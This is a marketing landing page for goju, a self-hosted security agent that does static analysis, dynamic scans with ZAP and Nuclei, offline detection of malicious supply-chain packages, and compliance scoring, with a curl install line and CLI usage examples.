One agent across four fronts — static, dynamic, supply chain and regulatory. It watches the code you wrote and the code you didn't, on infrastructure you control. Nothing leaves the box.
curl -fsSL https://goju.app/install.sh | sh
Coming soon
goju replaces a drawer full of tools with a single self-hosted agent. Three fronts are deep, built-in and run fully offline; the fourth orchestrates the industry-standard engines against your running apps.
Your code & config, at rest — SAST (Semgrep, gosec, optional LLM review), secrets in the tree and across git history, IaC misconfiguration, PII / cardholder data, and OSS license policy.
built-in · offlineYour running apps — OWASP ZAP and Nuclei driven through goju: baseline, OpenAPI and authenticated scans, with automatic environment detection. Industry engines, run on your infrastructure.
ZAP · Nuclei · your infraThe code you didn't write — malicious install hooks, typosquats, transitive worms, CI/CD attacks and AI/ML model artifacts, matched against ~227k known-malicious packages, fully offline.
goju's deepest front →Evidence, not questionnaires — DORA, NIS2, EU CRA, SOC 2, GDPR and PCI-DSS, scored from your real scan data with gaps, recommendations, reporting deadlines and role-based cockpits.
6 frameworks · scoredCVE scanners tell you about yesterday's known vulnerabilities. goju also detects the actual compromise patterns — statically, before they reach a database — and we publish the numbers.
postinstall/preinstall scripts that exfiltrate credentials, fetch payloads or propagate worms — the Shai-Hulud / event-stream / ua-parser-js pattern, across 14 manifest formats.
behavior · BHV-*The full OSV malicious set — npm, PyPI, RubyGems, crates, Go, Maven, Packagist — baked into the binary and matched offline. No lookup call, works fully air-gapped. Refresh per release.
malpkg · 227k offline DBDamerau-Levenshtein edit-distance plus Cyrillic/Greek homoglyph detection across npm, PyPI, Go, Cargo and Composer. Catches lodahs, requets, Cyrillic-а-in-react.
Most scanners stop at your top-level manifest. goju walks node_modules, .venv and vendor/ and applies the same rules to every installed package — where the worm actually lives.
Unpinned GitHub Actions, pull_request_target with checkout (the tj-actions pattern), script injection and secret exposure on PR triggers.
Real pickle-opcode disassembly over .pkl/.pt/.ckpt models catches code-execution payloads; OWASP-LLM-Top-10 app flaws and unpinned / typosquatted model references round it out.
Measured, not asserted — every release is scored against a labelled corpus (make bench), published in the repo.
If you scan with a cloud vendor, you're uploading your dependency tree — and often your source — to a third party. goju is one binary you run yourself. Same job, in many cases deeper, without the upload — and with the controls a regulated team needs.
--fail-on-critical, SARIF out, and auto-fix PRs.One line, no dependencies. The static, supply-chain and regulatory fronts work with zero setup; dynamic adds ZAP/Nuclei when you want it.
Point it at any project: goju supply-chain ./ — or goju scan --all for the full agent. No database, no account.
Add --fail-on-critical in CI, or goju serve for the dashboard, scheduled scans, auto-scan on push and auto-fix PRs.
One self-hosted binary. Static, dynamic, supply chain and regulatory. Your code never leaves the box.
curl -fsSL https://goju.app/install.sh | sh
Coming soon